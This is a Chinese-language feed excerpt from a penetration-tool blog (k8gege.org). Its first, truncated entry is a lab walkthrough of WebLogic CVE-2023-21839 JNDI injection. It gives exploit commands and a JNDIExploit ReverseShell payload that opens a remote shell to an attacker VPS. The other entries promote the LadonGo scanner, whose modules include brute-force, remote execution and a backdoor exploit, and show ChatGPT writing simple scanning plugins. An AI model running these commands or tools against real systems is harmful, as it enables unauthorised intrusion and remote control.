href="https://github.com/4ra1n/CVE-2023-21839" target="_blank" rel="noopener">https://github.com/4ra1n/CVE-2023-21839</a></p><p>GO编译</p><p>go build -o CVE-2023-21839.exe</p><p>####(4)漏洞检测</p><p>通过Ladon监听,无需dnslog等,不会向第3方泄露授权检测站点漏洞信息,部署在目标内网也可解决目标内网不出网无法利用目标内网存在相关漏洞的问题。</p><h5 id="Ladon-监听命令:"><a href="#Ladon-监听命令:" class="headerlink" title="Ladon 监听命令:"></a>Ladon 监听命令:</h5><p>Ladon web 800</p><p>使用20230228后版本,不然批量LDAP时可能会崩溃</p><h5 id="exp测试漏洞"><a href="#exp测试漏洞" class="headerlink" title="exp测试漏洞"></a>exp测试漏洞</h5><p>exp.exe -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:800</p><p>Ladon监听出现JNDI_LDAP字符串 代表存在JNDI注入漏洞</p><p>图片</p><p>####(4)反弹shell:</p><p>使用JNDI漏洞利用工具,在VPS开启服务,监听1389端口。</p><p>java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.188.2 -l 1389 -p 9999</p><p>####(5)在VPS上使用Ladon监听端口:</p><p>Ladon NC监听 4444</p><p>####(6)在渗透机上执行以下命令</p><p>CVE-2023-21839 -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:1389/Basic/ReverseShell/192.168.188.2/4444</p><p>图片</p><p>####(7)成功getshell</p><p>接下来就可以执行任意命令,linux也可以使用自带NC监听,对于windows可使用PowerLadon内存加载后渗透。</p><p>图片</p><p>Ladon 10.9 20230302<br>[u]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$<br>[u]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求<br>[u]WebLogicPoc CVE-2020-14883高危漏洞检测可识别出Windows或Linux<br>[-]PortTran CS版移除 端口转发工具<br>[u]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)<br>[-]Help 仅911版保留 功能很多 建议看Wiki或Ladon Study<br>[-]SMBGhost 仅CS和911版保留 Win10默认自动更新,实战遇到概率低<br>[-]vsFTPdPoc 仅CS和911版保留 2011漏洞过旧,实战遇到概率低<br>[-]CVE-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低<br>[-]PhpStudyPoc 仅CS和911版保留<br><img alt data-original="https://k8gege.org/k8img/Ladon/exe/Ladn85Subdomain.PNG"></p><p>如果已整理好URL,可使用WhatCMS快速识别</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon url.txt WhatCMS</span><br></pre></td></tr></table></figure><p><img alt data-original="https://k8gege.org/k8img/Ladon/cs/CS_WhatCMS.gif"></p><h3 id="Ladon下载"><a href="#Ladon下载" class="headerlink" title="Ladon下载"></a>Ladon下载</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>历史版本: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>911版本:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>10.10版本:K8小密圈</p>]]></content>
<summary type="html">
<h3 id="0x00-实验环境"><a href="#0x00-实验环境" class="headerlink" title="0x00 实验环境"></a>0x00 实验环境</h3><p>攻击机:Windows</p>
<p>靶场:vulhub 12.2.1.3环境</p
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="CVE-2023-21839" scheme="http://k8gege.org/tags/CVE-2023-21839/"/>
<category term="Weblogic" scheme="http://k8gege.org/tags/Weblogic/"/>
</entry>
<entry>
<title>〖工具〗LadonGo开源全平台内网渗透扫描器</title>
<link href="http://k8gege.org/p/LadonGo.html"/>
<id>http://k8gege.org/p/LadonGo.html</id>
<published>2023-03-25T13:40:00.000Z</published>
<updated>2024-11-14T15:02:48.858Z</updated>
<content type="html"><![CDATA[<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。4.3版本包含43个模块功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,10种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis,存活探测/信息收集/指纹识别OnlinePC、Ping、Icmp、SnmpScan,HttpBanner、HttpTitle、TcpBanner、WeblogicScan、OxidScan,端口扫描/服务探测PortScan。</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/LadonGo.html";</script><h3 id="功能模块"><a href="#功能模块" class="headerlink" title="功能模块"></a>功能模块</h3><h4 id="Detection"><a href="#Detection" class="headerlink" title="Detection"></a>Detection</h4><table><thead><tr><th>.</th><th>.</th></tr></thead><tbody><tr><td>OnlinePC</td><td>(Using ICMP/SNMP/Ping detect Online hosts)</td></tr><tr><td>PingScan</td><td>(Using system ping to detect Online hosts)</td></tr><tr><td>IcmpScan</td><td>(Using ICMP Protocol to detect Online hosts)</td></tr><tr><td>SnmpScan</td><td>(Using Snmp Protocol to detect Online hosts)</td></tr><tr><td>HttpBanner</td><td>(Using HTTP Protocol Scan Web Banner)</td></tr><tr><td>HttpTitle</td><td>(Using HTTP protocol Scan Web titles)</td></tr><tr><td>T3Scan</td><td>(Using T3 Protocol Scan Weblogic hosts)</td></tr><tr><td>PortScan</td><td>(Scan hosts open ports using TCP protocol)</td></tr><tr><td>TcpBanner</td><td>(Scan hosts open ports using TCP protocol)</td></tr><tr><td>OxidScan</td><td>(Using dcom Protocol enumeration network interfaces)</td></tr></tbody></table><h4 id="VulDetection"><a href="#VulDetection" class="headerlink" title="VulDetection"></a>VulDetection</h4><table><thead><tr><th>.</th><th>.</th></tr></thead><tbody><tr><td>MS17010</td><td>(Using SMB Protocol to detect MS17010 hosts)</td></tr><tr><td>SmbGhost</td><td>(Using SMB Protocol to detect SmbGhost hosts)</td></tr><tr><td>CVE-2021-21972</td><td>(Check VMware vCenter 6.5 6.7 7.0 Rce Vul)</td></tr><tr><td>CVE-2021-26855</td><td>(Check CVE-2021-26855 Microsoft Exchange SSRF)</td></tr></tbody></table><h4 id="BruteForce"><a href="#BruteForce" class="headerlink" title="BruteForce"></a>BruteForce</h4><table><thead><tr><th>.</th><th>.</th></tr></thead><tbody><tr><td>SmbScan</td><td>(Using SMB Protocol to Brute-For 445 Port)</td></tr><tr><td>SshScan</td><td>(Using SSH Protocol to Brute-For 22 Port)</td></tr><tr><td>FtpScan</td><td>(Using FTP Protocol to Brute-For 21 Port)</td></tr><tr><td>401Scan</td><td>(Using HTTP BasicAuth to Brute-For web Port)</td></tr><tr><td>MysqlScan</td><td>(Using Mysql Protocol to Brute-For 3306 Port)</td></tr><tr><td>MssqlScan</td><td>(Using Mssql Protocol to Brute-For 1433 Port)</td></tr><tr><td>OracleScan</td><td>(Using Oracle Protocol to Brute-For 1521 Port)</td></tr><tr><td>WinrmScan</td><td>(Using Winrm Protocol to Brute-For 5985 Port)</td></tr><tr><td>SqlplusScan</td><td>(Using Oracle Sqlplus Brute-For 1521 Port)</td></tr><tr><td>RedisScan</td><td>(Using Redis Protocol to Brute-For 6379 Port)</td></tr></tbody></table><h4 id="RemoteExec"><a href="#RemoteExec" class="headerlink" title="RemoteExec"></a>RemoteExec</h4><table><thead><tr><th>.</th><th>.</th></tr></thead><tbody><tr><td>SshCmd</td><td>(SSH Remote command execution Default 22 Port)</td></tr><tr><td>WinrmCmd</td><td>(Winrm Remote command execution Default 5985 Port)</td></tr><tr><td>PhpShell</td><td>(Php WebShell command execution Default 80 Port)</td></tr></tbody></table><h4 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h4><table><thead><tr><th>.</th><th>.</th></tr></thead><tbody><tr><td>PhpStudyDoor</td><td>(PhpStudy 2016 & 2018 BackDoor Exploit)</td></tr></tbody></table><h3 id="源码编译"><a href="#源码编译" class="headerlink" title="源码编译"></a>源码编译</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">go get github.com/k8gege/LadonGo</span><br><span class="line">go build Ladon.go</span><br></pre></td></tr></table></figure><h3 id="快速编译"><a href="#快速编译" class="headerlink" title="快速编译"></a>快速编译</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">make windows</span><br><span class="line">make linux</span><br><span class="line">make mac</span><br></pre></td></tr></table></figure><h3 id="一键安装"><a href="#一键安装" class="headerlink" title="一键安装"></a>一键安装</h3><h4 id="Linux-Mac"><a href="#Linux-Mac" class="headerlink" title="Linux/Mac"></a>Linux/Mac</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make install</span><br></pre></td></tr></table></figure><h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go run install.go</span><br></pre></td></tr></table></figure><h3 id="使用教程"><a href="#使用教程" class="headerlink" title="使用教程"></a>使用教程</h3><h4 id="帮助"><a href="#帮助" class="headerlink" title="帮助"></a>帮助</h4><p>Ladon help<br>Ladon Detection<br>Ladon BruteForce</p><h4 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h4><p>Ladon IP/机器名/CIDR 扫描模块</p><h4 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h4><h5 id="信息收集、漏洞检测"><a href="#信息收集、漏洞检测" class="headerlink" title="信息收集、漏洞检测"></a>信息收集、漏洞检测</h5><p>Ping扫描C段存活主机(任意权限)<br>Ladon 192.168.1.8/24 PingScan</p><p>ICMP扫描C段存活主机(管理员权限)<br>Ladon 192.168.1.8/24 IcmpScan</p><p>SMB扫描C段永恒之蓝MS17010漏洞主机<br>Ladon 192.168.1.8/24 MS17010</p><p>SMB扫描C段永恒之黑SmbGhost漏洞主机<br>Ladon 192.168.1.8/24 SmbGhost</p><p>T3扫描C段开放WebLogic的主机<br>Ladon 192.168.1.8/24 T3Scan</p><p>HTTP扫描C段开放Web站点Banner<br>Ladon 192.168.1.8/24 BannerScan</p><h5 id="密码爆破、弱口令"><a href="#密码爆破、弱口令" class="headerlink" title="密码爆破、弱口令"></a>密码爆破、弱口令</h5><p>扫描C段445端口Windows机器弱口令<br>Ladon 192.168.1.8/24 SmbScan</p><p>扫描C段22端口Linux机器SSH弱口令<br>Ladon 192.168.1.8/24 SshScan</p><p>扫描C段21端口FTP服务器弱口令<br>Ladon 192.168.1.8/24 SshScan</p><p>扫描C段3306端口Mysql服务器弱口令<br>Ladon 192.168.1.8/24 SshScan</p><h3 id="扫描速度"><a href="#扫描速度" class="headerlink" title="扫描速度"></a>扫描速度</h3><p>1.和Ladon一样,ICMP探测C段仅需1秒<br>2.Ping扫描C段大约11秒,支持任意权限<br>3.其它模块自行测试</p><h3 id="跨平台-全平台-全系统"><a href="#跨平台-全平台-全系统" class="headerlink" title="跨平台/全平台/全系统"></a>跨平台/全平台/全系统</h3><h4 id="TestOn"><a href="#TestOn" class="headerlink" title="TestOn"></a>TestOn</h4><table><thead><tr><th>ID</th><th>OS</th></tr></thead><tbody><tr><td>0</td><td>WinXP</td></tr><tr><td>1</td><td>Win 2003</td></tr><tr><td>2</td><td>Win 7</td></tr><tr><td>3</td><td>Win 8.1</td></tr><tr><td>4</td><td>Win 10</td></tr><tr><td>5</td><td>Win 2008 R2</td></tr><tr><td>6</td><td>Win 2012 R2</td></tr><tr><td>7</td><td>Kali 2019</td></tr><tr><td>8</td><td>SUSE 10</td></tr><tr><td>9</td><td>CentOS 5.8</td></tr><tr><td>10</td><td>CentOS 6.8</td></tr><tr><td>11</td><td>Fedora 5</td></tr><tr><td>12</td><td>RedHat 5.7</td></tr><tr><td>13</td><td>BT5-R3 (Ubuntu 8)</td></tr><tr><td>14</td><td>MacOS 10.15</td></tr></tbody></table><p>以上系统测试成功,其它系统未测,若某些系统不支持可自行编译</p><h4 id="MacOS-x64-10-15"><a href="#MacOS-x64-10-15" class="headerlink" title="MacOS x64 10.15"></a>MacOS x64 10.15</h4><p><img alt="image" data-original="https://k8gege.org/k8img/LadonGo/MacMS17010.png"></p><h4 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h4><p><img alt="image" data-original="https://k8gege.org/k8img/LadonGo/LnxMS17010.PNG"></p><h4 id="Windows-1"><a href="#Windows-1" class="headerlink" title="Windows"></a>Windows</h4><p><img alt="image" data-original="https://k8gege.org/k8img/LadonGo/WinMS17010.PNG"></p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><h4 id="LadonGo-ALL-OS"><a href="#LadonGo-ALL-OS" class="headerlink" title="LadonGo (ALL OS)"></a>LadonGo (ALL OS)</h4><p><a href="https://github.com/k8gege/LadonGo" target="_blank" rel="noopener">https://github.com/k8gege/LadonGo</a></p><h4 id="Ladon-Windows-amp-Cobalt-Strike"><a href="#Ladon-Windows-amp-Cobalt-Strike" class="headerlink" title="Ladon (Windows & Cobalt Strike)"></a>Ladon (Windows & Cobalt Strike)</h4><p>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a><br>911版本:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>10.10版本:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="LadonGo" scheme="http://k8gege.org/tags/LadonGo/"/>
</entry>
<entry>
<title>〖教程〗ChatGPT编写Ladon渗透工具插件视频教程</title>
<link href="http://k8gege.org/p/ChatGPT.html"/>
<id>http://k8gege.org/p/ChatGPT.html</id>
<published>2023-03-12T07:30:00.000Z</published>
<updated>2024-11-14T15:02:47.907Z</updated>
<content type="html"><![CDATA[<h1 id="【视频】ChatGPT编写Ladon渗透插件之端口扫描-rar【视频】ChatGPT编写Ladon渗透插件之网页标题获取-rar"><a href="#【视频】ChatGPT编写Ladon渗透插件之端口扫描-rar【视频】ChatGPT编写Ladon渗透插件之网页标题获取-rar" class="headerlink" title="【视频】ChatGPT编写Ladon渗透插件之端口扫描.rar【视频】ChatGPT编写Ladon渗透插件之网页标题获取.rar"></a>【视频】ChatGPT编写Ladon渗透插件之端口扫描.rar【视频】ChatGPT编写Ladon渗透插件之网页标题获取.rar</h1><p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="/Ladon/ChatGPT.html";</script><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/LadonGUI.png"></p><h3 id="Ladon简介"><a href="#Ladon简介" class="headerlink" title="Ladon简介"></a>Ladon简介</h3><p>Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.9版本内置200个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。</p><h3 id="C-开发Ladon渗透工具插件例子"><a href="#C-开发Ladon渗透工具插件例子" class="headerlink" title="C#开发Ladon渗透工具插件例子"></a>C#开发Ladon渗透工具插件例子</h3><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">using</span> System;</span><br><span class="line"><span class="keyword">using</span> System.Collections.Generic;</span><br><span class="line"><span class="keyword">using</span> System.Text;</span><br><span class="line"><span class="keyword">using</span> System.Net;</span><br><span class="line"><span class="keyword">using</span> System.Text.RegularExpressions;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">LadonDLL</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">class</span> <span class="title">scan</span></span><br><span class="line"> {</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">string</span> <span class="title">run</span>(<span class="params"><span class="keyword">string</span> ip</span>)</span></span><br><span class="line"><span class="function"></span> {</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">string</span>.IsNullOrEmpty(ip))</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"demo: "</span>+ip + <span class="string">"\r\n"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Demo的功能为打印存活IP,编译DLL,把DLL放在Ladon目录下,使用以下命令测试,结果将输出ICMP即可Ping通的机器IP,因为Ladon默认先使用ICMP探测存活主机,然后再执行插件内部对应的功能。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon netscan.dll 扫描当前机器所在C段</span><br><span class="line">Ladon 192.168.1.1/24 netscan.dll 指定C段</span><br></pre></td></tr></table></figure><p>工程源码:<a href="https://github.com/k8gege/Ladon/blob/master/Demo_DLL.rar" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/blob/master/Demo_DLL.rar</a> 使用VS2010或以上版本打开,若是ChatGPT生成的代码建议使用VS2015或之后版本,不然可能有些代码不能直接使用。</p><h3 id="简单了解ChatGPT回答问题的能力"><a href="#简单了解ChatGPT回答问题的能力" class="headerlink" title="简单了解ChatGPT回答问题的能力"></a>简单了解ChatGPT回答问题的能力</h3><p>给它输入Ladon简明教程地址,它给我胡编了一个答案,逻辑能力非常强,简直以假乱真。应该根据很多类似工具参考生成了固定模板,你告诉它Ladon是渗透工具,它就胡编乱写一个简介,不熟悉Ladon的人一看估计以为它说的是真的。甚至我在群里看到有人发的人工智能说k8gege也是一款渗透工具,不知道它是不是用的旧版chatGPT,虽然乱说,但逻辑能力是非常强的。</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/00.PNG"></p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/0.PNG"></p><p>让它把Ladon简介和版本说明做个排版,效果非常棒<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/info.PNG"></p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/info2.PNG"></p><h3 id="ChatGPT编写Ladon渗透工具插件之获取网页标题"><a href="#ChatGPT编写Ladon渗透工具插件之获取网页标题" class="headerlink" title="ChatGPT编写Ladon渗透工具插件之获取网页标题"></a>ChatGPT编写Ladon渗透工具插件之获取网页标题</h3><p>跟它聊天或做个表格,那就太小看它了,对于渗透或开发人员,我们可以让它帮我们写一些简单工具,或者一些功能模块。大家都知道Ladon工具的插件开发非常简单,一是直接配置INI插件,二是LadonEXP一键生成,三是自己编程实现。三的要求相对高一点,需要使用人员有一定编程能力。</p><p>我们让ChatGPT参考插件例子源码,让它使用C#编写一个获取网页标题的插件<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/1.PNG"></p><p>没等几秒钟,它立即给出以下代码<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/2.PNG"></p><p>打开demo工程,复制它给的代码,全选粘贴到工程里面去,编译并运行,测试看看</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/3.PNG"></p><p>运行结果报错,原因是我们扫描的是C段IP,即传入参数是IP,但获取网页标题需要的是URL,所以还得让它把IP处理成URL<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/4.PNG"><br>经过它的修改,可以成功获取网页标题,由于扫的是C段,我们并不知道哪个IP上面部署了IIS7,所以得让它把结果改下<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/5.PNG"><br>很快它又改好代码,再次编译测试<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/6.PNG"><br>测试发现除了获取标题外,还回显了很多访问不到的URL<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/7.PNG"><br>渗透时,我们不需要对不存在的URL进行分析,或者说存在但是当前IP被目标限制了访问不到,所以探测不到。不管是因为不存在而访问不到,还是IP限制访问不到,都无法对它进行渗透,如果C段存活主机非常多,或者说扫描B段,既然我们不关注不可访问结果,那么没必要让它显示。<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/8.PNG"><br>它给出了最终的代码,编译后,使用Ladon扫描C段,就只回显网页标题了<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ai/9.PNG"></p><h4 id="ChatGPT实现Ladon渗透插件获取网页标题代码"><a href="#ChatGPT实现Ladon渗透插件获取网页标题代码" class="headerlink" title="ChatGPT实现Ladon渗透插件获取网页标题代码"></a>ChatGPT实现Ladon渗透插件获取网页标题代码</h4><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">using</span> System;</span><br><span class="line"><span class="keyword">using</span> System.Collections.Generic;</span><br><span class="line"><span class="keyword">using</span> System.Text;</span><br><span class="line"><span class="keyword">using</span> System.Net;</span><br><span class="line"><span class="keyword">using</span> System.Text.RegularExpressions;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">LadonDLL</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">class</span> <span class="title">scan</span></span><br><span class="line"> {</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">string</span> <span class="title">run</span>(<span class="params"><span class="keyword">string</span> input</span>)</span></span><br><span class="line"><span class="function"></span> {</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">string</span>.IsNullOrEmpty(input))</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">string</span> url = <span class="string">""</span>;</span><br><span class="line"> Uri uriResult;</span><br><span class="line"> <span class="keyword">if</span> (Uri.TryCreate(input, UriKind.Absolute, <span class="keyword">out</span> uriResult)</span><br><span class="line"> && (uriResult.Scheme == Uri.UriSchemeHttp || uriResult.Scheme == Uri.UriSchemeHttps))</span><br><span class="line"> {</span><br><span class="line"> url = uriResult.ToString();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (Regex.IsMatch(input, <span class="string">@"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(:\d+)?$"</span>))</span><br><span class="line"> {</span><br><span class="line"> url = <span class="string">"http://"</span> + input;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">string</span>.IsNullOrEmpty(url))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Invalid URL or IP address"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">string</span> title = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">try</span></span><br><span class="line"> {</span><br><span class="line"> WebClient client = <span class="keyword">new</span> WebClient();</span><br><span class="line"> <span class="keyword">string</span> html = client.DownloadString(url);</span><br><span class="line"> Regex regex = <span class="keyword">new</span> Regex(<span class="string">@"(?<=<title.*>)([\s\S]*)(?=</title>)"</span>, RegexOptions.IgnoreCase);</span><br><span class="line"> title = regex.Match(html).Value.Trim();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">catch</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> url + <span class="string">"\t"</span> + title + <span class="string">"\r\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="ChatGPT编写Ladon渗透插件之端口扫描代码"><a href="#ChatGPT编写Ladon渗透插件之端口扫描代码" class="headerlink" title="ChatGPT编写Ladon渗透插件之端口扫描代码"></a>ChatGPT编写Ladon渗透插件之端口扫描代码</h4><p>```csharp<br>using System;<br>using System.Collections.Generic;<br>using System.Net;<br>using System.Net.Sockets;</p><p>namespace LadonDLL<br>{<br> public class scan<br> {<br> public static string run(string ip)<br> {<br> if (string.IsNullOrEmpty(ip))<br> return “”;</p><pre><code> // 要扫描的端口列表 List<int> ports = new List<int>() { 21, 80, 443, 22, 445, 135 }; string result = ""; // 扫描每个端口并添加结果到字符串 foreach (int port in ports) { if (IsPortOpen(ip, port)) { result += $"{ip}\t{port}\tOPEN\r\n"; } } return result; } // 检查端口是否开放 static bool IsPortOpen(string ip, int port) { try { using (TcpClient client = new TcpClient()) { client.Connect(ip, port); return true; } } catch { return false; } }}</code></pre><p>}</p><p>```csharp</p><p>PS:Ladon自带模块WebScan或WhatCMS或PortScan均包含网页标题功能获取,PortScan端口扫描模块也包含很多协议指纹识别,大家有兴趣也可以让chatGPT帮实现更多更好用的插件功能。</p><h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>本文演示如何使用ChatGPT开发Ladon插件,快速扩展Ladon扫描能力,借助ChatGPT,编程新手也可以快速编写POC。有一点大家要注意,使用ChatGPT做一件事最好只在一个chat里操作,不然它会结合上下文,把你的需求搞乱,给多余或混乱代码。你自身的专业能力越强,它和你的对话就越专业,你问得模糊不清,自己一知半解,你的专业术语或表述不对,它给你的结果自然垃圾。甚至有时候它给的很多代码压根就不能用,但是它胡编乱造的能力,让你一眼觉得代码是正确可用的,实际编译发现,不能用,比如某些协议它给的包就压根不对,我测试了十几次,同样问题它随机给了好几次代码,其中有3次重复,但这些不是重点,重点是都用不了,有是发包协议是这个数组有时是另一个,有时是对的,但整个请求代码还有其它错误,导致用不了,你得告诉它教它改,虽然这样,就它目前的能力,也是非常强的,让它写一个Ladon简单功能插件,基本也就5分钟左右,当然如果需求足够清晰,够了解它,让它不要乱改什么,要实现的功能,每一条都写清楚,也有可能一步到位,一问就搞定,加上编译测试,整个过程估计也就一分钟左右。</p><h3 id="视频教程"><a href="#视频教程" class="headerlink" title="视频教程"></a>视频教程</h3><p><a href="https://github.com/k8gege/ChatLadon" target="_blank" 